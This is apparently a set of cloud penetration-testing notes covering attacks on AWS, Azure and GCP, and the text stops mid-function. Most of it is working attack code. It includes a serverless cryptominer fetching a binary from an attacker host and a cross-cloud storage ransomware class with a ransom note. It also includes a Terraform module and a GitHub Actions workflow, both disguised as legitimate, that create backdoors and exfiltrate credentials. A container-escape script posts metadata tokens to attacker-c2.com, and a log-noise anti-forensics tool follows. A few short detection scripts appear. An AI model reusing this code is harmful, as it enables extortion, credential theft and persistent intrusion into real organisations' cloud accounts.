Cloud VAPT Notes (Multi-Cloud)

Edwin Tok | Shiro

Cloud Pentesting (Multi-Cloud)


Multi-Cloud Attack Chains

Modern Cross-Cloud Scenarios:

# Scenario 1: AWS → Azure credential chain
# Service account key in AWS S3 bucket → Azure Storage → Entra ID access

# From AWS (assuming you've compromised AWS account):
aws s3 ls s3://company-secrets --recursive | grep -i "azure\|entra\|graph"
aws s3 cp s3://company-secrets/azure/service-principal.json . --profile compromised

# Use Azure credentials
az login --service-principal \
    --username $(jq -r '.appId' service-principal.json) \
    --password $(jq -r '.password' service-principal.json) \
    --tenant $(jq -r '.tenant' service-principal.json)

# Now pivot to Azure resources
az resource list --output table
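
# The single-bucket grep above assumes you already know where secrets live.
# A minimal boto3 sketch (keyword list is illustrative) that sweeps every
# readable bucket for likely cross-cloud credential files:

import boto3

# Same profile as the CLI steps above
s3 = boto3.Session(profile_name='compromised').client('s3')
keywords = ('azure', 'entra', 'service-principal', 'graph')

for bucket in s3.list_buckets()['Buckets']:
    name = bucket['Name']
    try:
        paginator = s3.get_paginator('list_objects_v2')
        for page in paginator.paginate(Bucket=name):
            for obj in page.get('Contents', []):
                if any(k in obj['Key'].lower() for k in keywords):
                    print(f"s3://{name}/{obj['Key']}")
    except Exception:
        continue  # no list permission on this bucket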
# Scenario 2: GCP → AWS via Workload Identity Federation
# GCP service account → AWS role via OIDC federation

# From GCP:
gcloud iam service-accounts create aws-access-sa \
    --display-name="AWS Integration Service" \
    --project=PROJECT_ID

# Get GCP identity token (with impersonation, --audiences sets the token's
# aud claim, which must match what the AWS-side provider config expects)
TOKEN=$(gcloud auth print-identity-token \
    --audiences="AUDIENCE" \
    --impersonate-service-account=aws-access-sa@PROJECT_ID.iam.gserviceaccount.com)

# Use token to assume AWS role (if federation configured)
aws sts assume-role-with-web-identity \
    --role-arn arn:aws:iam::ACCOUNT_ID:role/GCPFederatedRole \
    --role-session-name gcp-to-aws \
    --web-identity-token $TOKEN
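
# For the exchange above to work, the AWS side must already trust Google as
# an OIDC provider. A sketch (values illustrative) of the trust policy the
# GCPFederatedRole needs - shown via boto3 for consistency:

import json
import boto3

iam = boto3.client('iam')

# "aud" must match the audience/unique ID configured for the GCP service
# account; SERVICE_ACCOUNT_UNIQUE_ID is a placeholder
trust_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "accounts.google.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {
            "StringEquals": {
                "accounts.google.com:aud": "SERVICE_ACCOUNT_UNIQUE_ID"
            }
        }
    }]
}

iam.create_role(
    RoleName='GCPFederatedRole',
    AssumeRolePolicyDocument=json.dumps(trust_policy)
)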
# Scenario 3: GitHub Actions → Multi-Cloud
# Compromise GitHub Actions runner → Access AWS, Azure, GCP

# GitHub Actions workflow with multi-cloud access:
# .github/workflows/exploit.yml
name: Multi-Cloud Access
on: workflow_dispatch

jobs:
  multi-cloud:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: AWS Access
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::ACCOUNT:role/GitHubActionsRole
          aws-region: us-east-1
      
      - name: Azure Access
        uses: azure/login@v1
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      
      - name: GCP Access
        uses: google-github-actions/auth@v1
        with:
          workload_identity_provider: 'projects/PROJECT_NUM/locations/global/workloadIdentityPools/POOL/providers/PROVIDER'
          service_account: 'sa@PROJECT.iam.gserviceaccount.com'
      
      - name: Exfiltrate
        run: |
          aws s3 ls > /tmp/aws-resources.txt
          az resource list > /tmp/azure-resources.txt
          gcloud projects list > /tmp/gcp-projects.txt
          # curl -F does not expand globs; send each file explicitly
          for f in /tmp/*.txt; do
            curl -X POST https://attacker-c2.com/data -F "file=@$f"
          done

Federated Identity Exploitation:

# Modern organizations use identity federation extensively
# SAML, OIDC, OAuth 2.0 between cloud providers

# Common federation paths:
# 1. On-premises AD → Azure AD (Entra ID) → AWS/GCP
# 2. Okta → All clouds
# 3. Google Workspace → GCP → AWS (via federation)
# 4. GitHub → Cloud providers (via OIDC)

# Attack vector: Compromise federation provider
# Example: Compromise Okta → Access all federated clouds

# Check for federation in AWS:
aws iam list-saml-providers
aws iam get-saml-provider --saml-provider-arn arn:aws:iam::ACCOUNT:saml-provider/ProviderName

# Check identities in Azure (Microsoft Graph PowerShell) - this filter lists
# managed identities; app registrations' federated credentials are separate:
Get-MgServicePrincipal | Where-Object {$_.ServicePrincipalType -eq "ManagedIdentity"}
Get-MgApplicationFederatedIdentityCredential -ApplicationId $appObjectId

# Check Workload Identity Federation in GCP:
gcloud iam workload-identity-pools list --location=global --project=PROJECT_ID
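
# Equivalent boto3 sweep of the AWS-side federation surface (both SAML and
# OIDC providers), useful when enumerating at scale:

import boto3

iam = boto3.client('iam')

# SAML providers (e.g., Okta, ADFS, Entra ID)
for p in iam.list_saml_providers()['SAMLProviderList']:
    print(f"SAML: {p['Arn']}")

# OIDC providers (e.g., GitHub Actions, GCP, EKS)
for p in iam.list_open_id_connect_providers()['OpenIDConnectProviderList']:
    detail = iam.get_open_id_connect_provider(OpenIDConnectProviderArn=p['Arn'])
    print(f"OIDC: {p['Arn']} audiences={detail['ClientIDList']}")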

Advanced Persistence Techniques (Cross-Cloud)

Cloud-Native Malware:

# Serverless cryptominer (works across clouds with slight modifications)
# AWS Lambda / Azure Function / GCP Cloud Function

import subprocess
import urllib.request
import json
import os

def handler(event, context):
    """
    Serverless cryptominer - executes mining in cloud function
    Adapts to AWS Lambda, Azure Functions, or GCP Cloud Functions
    """
    
    # Detect cloud provider from runtime environment variables
    if 'AWS_LAMBDA_FUNCTION_NAME' in os.environ:
        cloud = 'aws'
    elif 'WEBSITE_SITE_NAME' in os.environ:  # Azure App Service / Functions
        cloud = 'azure'
    elif 'FUNCTION_NAME' in os.environ or 'K_SERVICE' in os.environ:  # GCP gen1 / gen2
        cloud = 'gcp'
    else:
        cloud = 'unknown'
    
    # Download miner binary
    miner_url = "https://attacker-server.com/miner"
    miner_path = "/tmp/miner"
    
    try:
        urllib.request.urlretrieve(miner_url, miner_path)
        os.chmod(miner_path, 0o755)
        
        # Run miner (bounded by the platform timeout - 15 min max on Lambda;
        # Azure and GCP limits vary by plan/generation)
        pool = "pool.attacker.com:4444"
        wallet = "attacker-wallet-address"
        
        proc = subprocess.Popen([
            miner_path,
            "--pool", pool,
            "--wallet", wallet,
            "--cloud", cloud
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
        # The execution environment is frozen or reaped once the handler
        # returns, so hold the handler open for most of the timeout window
        try:
            proc.wait(timeout=840)  # ~14 min, inside a 15-min limit
        except subprocess.TimeoutExpired:
            pass
        
        return {
            'statusCode': 200,
            'body': json.dumps({'status': 'success', 'cloud': cloud})
        }
    
    except Exception as e:
        return {
            'statusCode': 500,
            'body': json.dumps({'error': str(e)})
        }

# Deploy across multiple clouds for distributed mining
# Cost: Minimal (functions billed per execution)
# Detection: Difficult (appears as legitimate function execution)
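
# A sketch of the "deploy across clouds" step for the AWS case, assuming the
# handler above is packaged as handler.py inside function.zip and an
# execution role already exists (names/regions are illustrative):

import boto3

regions = ['us-east-1', 'eu-west-1', 'ap-southeast-1']
zip_bytes = open('function.zip', 'rb').read()

for region in regions:
    client = boto3.client('lambda', region_name=region)
    client.create_function(
        FunctionName='metrics-collector',  # benign-looking name
        Runtime='python3.12',
        Role='arn:aws:iam::ACCOUNT_ID:role/lambda-exec',  # placeholder role
        Handler='handler.handler',
        Code={'ZipFile': zip_bytes},
        Timeout=900,  # max out the 15-minute limit
    )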

Cloud Storage Ransomware (Cross-Cloud):

# Storage encryption script (AWS S3 / Azure Blob / GCP GCS)
import boto3  # AWS
from azure.storage.blob import BlobServiceClient  # Azure
from google.cloud import storage  # GCP
from cryptography.fernet import Fernet
import os

class CloudStorageRansomware:
    def __init__(self, cloud_provider):
        self.provider = cloud_provider
        self.encryption_key = Fernet.generate_key()
        self.fernet = Fernet(self.encryption_key)
    
    def encrypt_aws_bucket(self, bucket_name):
        """Encrypt all objects in AWS S3 bucket"""
        s3 = boto3.client('s3')
        
        # Paginate - list_objects_v2 returns at most 1000 keys per call
        paginator = s3.get_paginator('list_objects_v2')
        
        for page in paginator.paginate(Bucket=bucket_name):
            for obj in page.get('Contents', []):
                key = obj['Key']
                
                # Download object
                response = s3.get_object(Bucket=bucket_name, Key=key)
                data = response['Body'].read()
                
                # Encrypt
                encrypted_data = self.fernet.encrypt(data)
                
                # Upload encrypted version
                s3.put_object(
                    Bucket=bucket_name,
                    Key=f"{key}.encrypted",
                    Body=encrypted_data
                )
                
                # Delete original
                s3.delete_object(Bucket=bucket_name, Key=key)
        
        # Drop ransom note (never embed the actual key - writing it into
        # the note would hand the victim free recovery)
        ransom_note = "Your files are encrypted. Send 1 BTC to recover. Contact: ransom@attacker.com"
        s3.put_object(
            Bucket=bucket_name,
            Key='README_RANSOM.txt',
            Body=ransom_note
        )
    
    def encrypt_azure_container(self, connection_string, container_name):
        """Encrypt all blobs in Azure Storage container"""
        blob_service = BlobServiceClient.from_connection_string(connection_string)
        container_client = blob_service.get_container_client(container_name)
        # List all blobs
        blob_list = container_client.list_blobs()
        
        for blob in blob_list:
            blob_client = container_client.get_blob_client(blob.name)
            
            # Download blob
            data = blob_client.download_blob().readall()
            
            # Encrypt
            encrypted_data = self.fernet.encrypt(data)
            
            # Upload encrypted version
            encrypted_blob_client = container_client.get_blob_client(f"{blob.name}.encrypted")
            encrypted_blob_client.upload_blob(encrypted_data, overwrite=True)
            
            # Delete original
            blob_client.delete_blob()
        
        # Drop ransom note (same caveat: the key stays with the operator)
        ransom_note = "Your files are encrypted. Send 1 BTC to recover. Contact: ransom@attacker.com"
        ransom_blob = container_client.get_blob_client('README_RANSOM.txt')
        ransom_blob.upload_blob(ransom_note, overwrite=True)
    
    def encrypt_gcp_bucket(self, bucket_name):
        """Encrypt all objects in GCP Cloud Storage bucket"""
        client = storage.Client()
        bucket = client.bucket(bucket_name)
        
        # List all blobs
        blobs = bucket.list_blobs()
        
        for blob in blobs:
            # Download blob
            data = blob.download_as_bytes()
            
            # Encrypt
            encrypted_data = self.fernet.encrypt(data)
            
            # Upload encrypted version
            encrypted_blob = bucket.blob(f"{blob.name}.encrypted")
            encrypted_blob.upload_from_string(encrypted_data)
            
            # Delete original
            blob.delete()
        
        # Drop ransom note (same caveat: the key stays with the operator)
        ransom_note = "Your files are encrypted. Send 1 BTC to recover. Contact: ransom@attacker.com"
        ransom_blob = bucket.blob('README_RANSOM.txt')
        ransom_blob.upload_from_string(ransom_note)

# OPSEC: Storage-level encryption bypasses many ransomware defenses (which watch endpoints, not buckets)
# Detection: Bulk object deletion/creation may trigger alerts
# Prevention: Versioning, immutable storage, backup isolation
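
# Since versioning and object lock defeat the delete-and-replace approach, a
# pre-flight check is worth running first; a boto3 sketch for the AWS case:

import boto3
from botocore.exceptions import ClientError

s3 = boto3.client('s3')

def bucket_is_soft_target(bucket_name):
    """True if the bucket has neither versioning nor object lock."""
    versioning = s3.get_bucket_versioning(Bucket=bucket_name)
    if versioning.get('Status') == 'Enabled':
        return False  # originals recoverable from prior versions
    try:
        s3.get_object_lock_configuration(Bucket=bucket_name)
        return False  # immutable storage configured
    except ClientError:
        return True   # no object lock configuration found

print(bucket_is_soft_target('company-secrets'))  # bucket name illustrative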

Supply Chain Attacks

Infrastructure-as-Code Poisoning:

# Malicious Terraform module (works across AWS, Azure, GCP)
# File: malicious-module/main.tf

# Appears to create legitimate backup infrastructure
# Actually creates backdoor access

terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
    azurerm = {
      source  = "hashicorp/azurerm"
      version = "~> 3.0"
    }
    # azuread is needed for the app registration / service principal below
    azuread = {
      source  = "hashicorp/azuread"
      version = "~> 2.0"
    }
    google = {
      source  = "hashicorp/google"
      version = "~> 5.0"
    }
  }
}

# Inputs and data sources referenced below
variable "cloud_provider" {
  type = string # "aws", "azure", or "gcp"
}

variable "project_id" {
  type    = string
  default = ""
}

data "azurerm_subscription" "current" {}
data "azurerm_client_config" "current" {}

# AWS Backdoor
resource "aws_iam_user" "backdoor" {
  count = var.cloud_provider == "aws" ? 1 : 0
  name  = "backup-service-account"
  
  tags = {
    Purpose     = "Automated Backups"
    ManagedBy   = "Terraform"
    Department  = "Infrastructure"
  }
}

resource "aws_iam_access_key" "backdoor_key" {
  count = var.cloud_provider == "aws" ? 1 : 0
  user  = aws_iam_user.backdoor[0].name
}

resource "aws_iam_user_policy_attachment" "backdoor_policy" {
  count      = var.cloud_provider == "aws" ? 1 : 0
  user       = aws_iam_user.backdoor[0].name
  policy_arn = "arn:aws:iam::aws:policy/PowerUserAccess"
}

# Exfiltrate credentials via HTTP request (looks like telemetry)
resource "null_resource" "telemetry" {
  count = var.cloud_provider == "aws" ? 1 : 0
  
  provisioner "local-exec" {
    command = <<-EOT
      curl -X POST https://telemetry.example.com/metrics \
        -H "Content-Type: application/json" \
        -d '{
          "module": "backup-infrastructure",
          "version": "1.2.3",
          "provider": "aws",
          "access_key": "${aws_iam_access_key.backdoor_key[0].id}",
          "secret_key": "${aws_iam_access_key.backdoor_key[0].secret}"
        }'
    EOT
  }
}

# Azure Backdoor (app registrations and service principals live in Entra ID,
# so these use the azuread provider, not azurerm)
resource "azuread_application" "backdoor" {
  count        = var.cloud_provider == "azure" ? 1 : 0
  display_name = "Backup Automation Service"
}

resource "azuread_service_principal" "backdoor" {
  count          = var.cloud_provider == "azure" ? 1 : 0
  application_id = azuread_application.backdoor[0].application_id
}

resource "azuread_application_password" "backdoor_secret" {
  count                 = var.cloud_provider == "azure" ? 1 : 0
  application_object_id = azuread_application.backdoor[0].object_id
  display_name          = "Terraform Managed"
  end_date              = "2034-01-01T00:00:00Z"
}

resource "azurerm_role_assignment" "backdoor_role" {
  count                = var.cloud_provider == "azure" ? 1 : 0
  scope                = data.azurerm_subscription.current.id
  role_definition_name = "Contributor"
  principal_id         = azurerm_service_principal.backdoor[0].object_id
}

# GCP Backdoor
resource "google_service_account" "backdoor" {
  count        = var.cloud_provider == "gcp" ? 1 : 0
  account_id   = "backup-automation"
  display_name = "Backup Automation Service Account"
  project      = var.project_id
}

resource "google_service_account_key" "backdoor_key" {
  count              = var.cloud_provider == "gcp" ? 1 : 0
  service_account_id = google_service_account.backdoor[0].name
}

resource "google_project_iam_member" "backdoor_role" {
  count   = var.cloud_provider == "gcp" ? 1 : 0
  project = var.project_id
  role    = "roles/editor"
  member  = "serviceAccount:${google_service_account.backdoor[0].email}"
}

# Outputs (appear helpful but expose credentials)
output "backup_credentials" {
  description = "Backup service credentials (store securely)"
  sensitive   = true
  value = var.cloud_provider == "aws" ? {
    access_key = aws_iam_access_key.backdoor_key[0].id
    secret_key = aws_iam_access_key.backdoor_key[0].secret
  } : var.cloud_provider == "azure" ? {
    client_id     = azuread_application.backdoor[0].application_id
    client_secret = azuread_application_password.backdoor_secret[0].value
    tenant_id     = data.azurerm_client_config.current.tenant_id
  } : {
    service_account_key = base64decode(google_service_account_key.backdoor_key[0].private_key)
  }
}

# OPSEC: Module appears legitimate (backup infrastructure)
# Tags and descriptions make resources look operational
# Outputs marked as sensitive (less visible in logs)
# Telemetry exfiltration disguised as normal metrics collection
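
# From the review side, the telltale combination is a local-exec provisioner
# shipping credential attributes to an external URL. A crude scanner sketch
# (patterns illustrative, expect false positives):

import re
import sys
from pathlib import Path

SUSPICIOUS = [
    re.compile(r'provisioner\s+"local-exec"'),
    re.compile(r'curl\s+.*https?://'),
    re.compile(r'\$\{[^}]*(secret|password|private_key|access_key)[^}]*\}', re.I),
]

for tf_file in Path(sys.argv[1]).rglob('*.tf'):
    text = tf_file.read_text(errors='ignore')
    hits = sum(1 for p in SUSPICIOUS if p.search(text))
    if hits >= 2:
        print(f"[!] {tf_file}: {hits}/3 exfiltration indicators matched")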

CI/CD Pipeline Compromise (Multi-Cloud):

# GitHub Actions workflow - appears to deploy infrastructure
# Actually exfiltrates credentials across all clouds
# File: .github/workflows/deploy-infrastructure.yml

name: Deploy Multi-Cloud Infrastructure
on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # OIDC federation
      contents: read
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      
      # AWS Access
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
          aws-region: us-east-1
      
      # Azure Access
      - name: Azure login
        uses: azure/login@v1
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      
      # GCP Access
      - name: Authenticate to GCP
        uses: google-github-actions/auth@v1
        with:
          workload_identity_provider: ${{ secrets.GCP_WORKLOAD_IDENTITY_PROVIDER }}
          service_account: ${{ secrets.GCP_SERVICE_ACCOUNT }}
      
      # "Infrastructure deployment" - actually credential exfiltration
      - name: Deploy infrastructure
        run: |
          # Collect AWS credentials (configure-aws-credentials exports env
          # vars, so read the session token from the environment - it is not
          # written to the CLI config file)
          AWS_CREDS=$(aws sts get-caller-identity)
          AWS_ACCOUNT=$(echo $AWS_CREDS | jq -r '.Account')
          AWS_ROLE=$(echo $AWS_CREDS | jq -r '.Arn')
          AWS_TOKEN=$AWS_SESSION_TOKEN
          
          # Collect Azure credentials
          AZURE_TOKEN=$(az account get-access-token --query accessToken -o tsv)
          AZURE_SUB=$(az account show --query id -o tsv)
          
          # Collect GCP credentials
          GCP_TOKEN=$(gcloud auth print-access-token)
          GCP_PROJECT=$(gcloud config get-value project)
          
          # "Deployment metrics" - actually exfiltration
          curl -X POST https://deployment-analytics.example.com/metrics \
            -H "Content-Type: application/json" \
            -H "X-Workflow-Run: ${{ github.run_id }}" \
            -d @- <<EOF
          {
            "repository": "${{ github.repository }}",
            "workflow": "${{ github.workflow }}",
            "timestamp": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
            "credentials": {
              "aws": {
                "account": "$AWS_ACCOUNT",
                "role": "$AWS_ROLE",
                "token": "$AWS_TOKEN"
              },
              "azure": {
                "subscription": "$AZURE_SUB",
                "token": "$AZURE_TOKEN"
              },
              "gcp": {
                "project": "$GCP_PROJECT",
                "token": "$GCP_TOKEN"
              }
            }
          }
          EOF
          
          # Actual deployment (minimal, to maintain cover)
          echo "Infrastructure deployed successfully"
      
      - name: Post-deployment validation
        run: |
          echo "Validation complete"
          # Further exfiltration could happen here

# OPSEC: Workflow appears legitimate (infrastructure deployment)
# Uses recommended authentication methods (OIDC, Workload Identity)
# Exfiltration disguised as analytics/telemetry
# Minimal actual deployment maintains operational cover
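
# Review-side heuristic: workflows that request id-token write plus logins to
# several clouds in one job deserve scrutiny. A small PyYAML sketch (heuristic
# only; action-name substrings are illustrative):

import sys
import yaml  # pip install pyyaml

with open(sys.argv[1]) as f:
    wf = yaml.safe_load(f)

for job_name, job in (wf.get('jobs') or {}).items():
    perms = job.get('permissions') or {}
    if isinstance(perms, dict) and perms.get('id-token') == 'write':
        uses = [s.get('uses', '') for s in job.get('steps', [])]
        clouds = [u for u in uses if any(k in u for k in (
            'aws-actions', 'azure/login', 'google-github-actions'))]
        if len(clouds) > 1:
            print(f"[!] job '{job_name}' federates to multiple clouds: {clouds}")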

Container Security (Cross-Cloud)

Container Escape Techniques (Universal):

#!/bin/bash
# Container escape script - works on AWS ECS, Azure ACI, GKE
# Detects environment and adapts escape technique

echo "[*] Container Escape Utility"

# Detect container runtime
if [ -f /.dockerenv ]; then
    RUNTIME="docker"
elif grep -q "containerd" /proc/1/cgroup 2>/dev/null; then
    RUNTIME="containerd"
elif grep -q "crio" /proc/1/cgroup 2>/dev/null; then
    RUNTIME="crio"
else
    RUNTIME="unknown"
fi

echo "[+] Detected runtime: $RUNTIME"

# Method 1: Check for privileged container
if [ -w /dev/sda ] || [ -w /dev/xvda ] || [ -w /dev/nvme0n1 ]; then
    echo "[!] Privileged container detected"
    echo "[+] Attempting host filesystem mount"
    
    # Mount host filesystem
    mkdir -p /mnt/host
    mount /dev/sda1 /mnt/host 2>/dev/null || \
    mount /dev/xvda1 /mnt/host 2>/dev/null || \
    mount /dev/nvme0n1p1 /mnt/host 2>/dev/null
    
    if [ $? -eq 0 ]; then
        echo "[+] Host filesystem mounted at /mnt/host"
        
        # Check for cloud metadata service from host context
        chroot /mnt/host /bin/bash -c "curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null" && \
            echo "[+] GCP metadata service accessible from host"
        
        # Azure URL contains '&', so it must be quoted inside the inner shell
        chroot /mnt/host /bin/bash -c "curl -H 'Metadata:true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' 2>/dev/null" && \
            echo "[+] Azure metadata service accessible from host"
        
        chroot /mnt/host /bin/bash -c "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null" && \
            echo "[+] AWS metadata service accessible from host"
        
        # Add SSH key to host
        if [ -f /mnt/host/root/.ssh/authorized_keys ]; then
            echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ... attacker@kali" >> /mnt/host/root/.ssh/authorized_keys
            echo "[+] SSH key added to host"
        fi
    fi
fi

# Method 2: Docker socket escape
if [ -S /var/run/docker.sock ]; then
    echo "[!] Docker socket mounted - attempting escape"
    
    # Check if docker client available
    if command -v docker &>/dev/null; then
        # Spawn an interactive privileged container with the host filesystem
        # mounted; a detached (-d) chroot bash exits immediately, so use -it
        docker run --rm -it --privileged --pid=host --net=host \
            -v /:/host \
            alpine:latest \
            chroot /host /bin/bash
        
        echo "[+] Privileged escape container exited"
    fi
fi

# Method 3: Kubernetes service account abuse
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
    echo "[!] Kubernetes service account detected"
    
    K8S_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    K8S_API="https://kubernetes.default.svc"
    
    # Try to list pods
    curl -k -H "Authorization: Bearer $K8S_TOKEN" \
        "$K8S_API/api/v1/namespaces/default/pods" 2>/dev/null | grep -q "items" && \
        echo "[+] Kubernetes API accessible"
    
    # Attempt to create privileged pod
    cat > /tmp/escape-pod.json <<EOF
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "escape-pod"},
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [{
      "name": "escape",
      "image": "alpine:latest",
      "command": ["/bin/sh"],
      "stdin": true,
      "tty": true,
      "securityContext": {"privileged": true},
      "volumeMounts": [{"mountPath": "/host", "name": "host-root"}]
    }],
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}]
  }
}
EOF
    
    curl -k -X POST \
        -H "Authorization: Bearer $K8S_TOKEN" \
        -H "Content-Type: application/json" \
        -d @/tmp/escape-pod.json \
        "$K8S_API/api/v1/namespaces/default/pods" 2>/dev/null && \
        echo "[+] Escape pod created"
fi

# Method 4: Capability abuse (CAP_SYS_ADMIN)
if capsh --print 2>/dev/null | grep -q "cap_sys_admin"; then
    echo "[!] CAP_SYS_ADMIN capability detected"
    
    # Confirm mount operations work in a fresh namespace; with this
    # capability, real escapes can mount host block devices or abuse
    # the cgroup release_agent
    unshare -m /bin/bash -c "
        mount --bind / /mnt
        echo '[+] Mounts permitted - escalation via mounts is viable'
    "
fi

# Method 5: Cloud-specific metadata access
echo "[+] Checking cloud metadata services"

# Try GCP
GCP_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" 2>/dev/null | \
    jq -r '.access_token')

if [ ! -z "$GCP_TOKEN" ] && [ "$GCP_TOKEN" != "null" ]; then
    echo "[+] GCP metadata service accessible"
    echo "[+] Token: ${GCP_TOKEN:0:50}..."
    
    # Exfiltrate token
    curl -X POST https://attacker-c2.com/gcp-token \
        -H "Content-Type: application/json" \
        -d "{\"token\":\"$GCP_TOKEN\"}" 2>/dev/null
fi

# Try Azure
AZURE_TOKEN=$(curl -s -H "Metadata:true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" 2>/dev/null | \
    jq -r '.access_token')

if [ ! -z "$AZURE_TOKEN" ] && [ "$AZURE_TOKEN" != "null" ]; then
    echo "[+] Azure metadata service accessible"
    echo "[+] Token: ${AZURE_TOKEN:0:50}..."
    
    # Exfiltrate token
    curl -X POST https://attacker-c2.com/azure-token \
        -H "Content-Type: application/json" \
        -d "{\"token\":\"$AZURE_TOKEN\"}" 2>/dev/null
fi

# Try AWS (IMDSv2 requires a session token; fall back to IMDSv1 if PUT fails)
IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
if [ -n "$IMDS_TOKEN" ]; then
    IMDS_HDR=(-H "X-aws-ec2-metadata-token: $IMDS_TOKEN")
else
    IMDS_HDR=()
fi

AWS_ROLE=$(curl -s "${IMDS_HDR[@]}" http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
if [ -n "$AWS_ROLE" ]; then
    AWS_CREDS=$(curl -s "${IMDS_HDR[@]}" http://169.254.169.254/latest/meta-data/iam/security-credentials/$AWS_ROLE 2>/dev/null)
    
    if [ -n "$AWS_CREDS" ]; then
        echo "[+] AWS metadata service accessible"
        echo "[+] Role: $AWS_ROLE"
        
        # Exfiltrate credentials
        curl -X POST https://attacker-c2.com/aws-creds \
            -H "Content-Type: application/json" \
            -d "$AWS_CREDS" 2>/dev/null
    fi
fi

echo "[*] Escape attempt complete"

Incident Response Evasion

Anti-Forensics Across Clouds:

#!/usr/bin/env python3
"""
Multi-Cloud Anti-Forensics Tool
Attempts to erase/obfuscate tracks across AWS, Azure, GCP
USE FOR AUTHORIZED TESTING ONLY
"""

import boto3  # AWS
from azure.identity import DefaultAzureCredential
from google.cloud import logging_v2  # GCP
import time
import random

class MultiCloudAntiForensics:
    def __init__(self):
        self.aws_session = None
        self.azure_credential = None
        self.gcp_client = None
    
    def setup_aws(self, profile=None):
        """Setup AWS session"""
        self.aws_session = boto3.Session(profile_name=profile)
        print("[+] AWS session established")
    
    def setup_azure(self):
        """Setup Azure credentials"""
        self.azure_credential = DefaultAzureCredential()
        print("[+] Azure credentials established")
    
    def setup_gcp(self, project_id):
        """Setup GCP client"""
        self.gcp_client = logging_v2.Client(project=project_id)
        print("[+] GCP client established")
    
    def create_noise_aws(self, num_events=1000):
        """Generate noise in AWS CloudTrail logs"""
        print(f"[*] Generating {num_events} noise events in AWS")
        
        ec2 = self.aws_session.client('ec2')
        s3 = self.aws_session.client('s3')
        
        for i in range(num_events):
            try:
                # Random benign API calls
                choice = random.randint(1, 5)
                
                if choice == 1:
                    ec2.describe_instances(MaxResults=5)
                elif choice == 2:
                    s3.list_buckets()
                elif choice == 3:
                    ec2.describe_security_groups(MaxResults=5)
                elif choice == 4:
                    ec2.describe_vpcs(MaxResults=5)
                else:
                    s3.list_buckets()
                
                # Random delay to appear natural
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                # Silently continue on errors
                pass
        
        print(f"[+] AWS noise generation complete")
    
    def create_noise_azure(self, subscription_id, num_events=1000):
        """Generate noise in Azure Activity Logs"""
        print(f"[*] Generating {num_events} noise events in Azure")
        
        from azure.mgmt.resource import ResourceManagementClient
        from azure.mgmt.compute import ComputeManagementClient
        
        resource_client = ResourceManagementClient(self.azure_credential, subscription_id)
        compute_client = ComputeManagementClient(self.azure_credential, subscription_id)
        
        for i in range(num_events):
            try:
                choice = random.randint(1, 3)
                
                if choice == 1:
                    list(resource_client.resource_groups.list())
                elif choice == 2:
                    list(compute_client.virtual_machines.list_all())
                else:
                    list(resource_client.resources.list())
                
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                pass
        
        print(f"[+] Azure noise generation complete")
    
    def create_noise_gcp(self, project_id, num_events=1000):
        """Generate noise in GCP Cloud Audit Logs"""
        print(f"[*] Generating {num_events} noise events in GCP")
        
        from google.cloud import compute_v1
        from google.cloud import storage
        
        instances_client = compute_v1.InstancesClient()
        storage_client = storage.Client()
        
        for i in range(num_events):
            try:
                choice = random.randint(1, 3)
                
                if choice == 1:
                    # List instances in random zone
                    zones = ['us-central1-a', 'us-east1-b', 'europe-west1-c']
                    zone = random.choice(zones)
                    request = compute_v1.ListInstancesRequest(project=project_id, zone=zone)
                    list(instances_client.list(request=request))
                
                elif choice == 2:
                    # List storage buckets
                    list(storage_client.list_buckets())
                
                else:
                    # List instances again (common operation)
                    zones = ['us-central1-a', 'us-east1-b']
                    zone = random.choice(zones)
                    request = compute_v1.ListInstancesRequest(project=project_id, zone=zone)
                    list(instances_client.list(request=request))
                
                time.sleep(random.uniform(0.1, 2.0))
                
                if (i + 1) % 100 == 0:
                    print(f"[+] Generated {i + 1} noise events")
            
            except Exception as e:
                pass
        
        print(f"[+] GCP noise generation complete")
    
    def timestamp_manipulation(self, cloud_provider):
        """Attempt to manipulate timestamps (where possible)"""
        print(f"[*] Attempting timestamp manipulation on {cloud_provider}")
        
        if cloud_provider == 'aws':
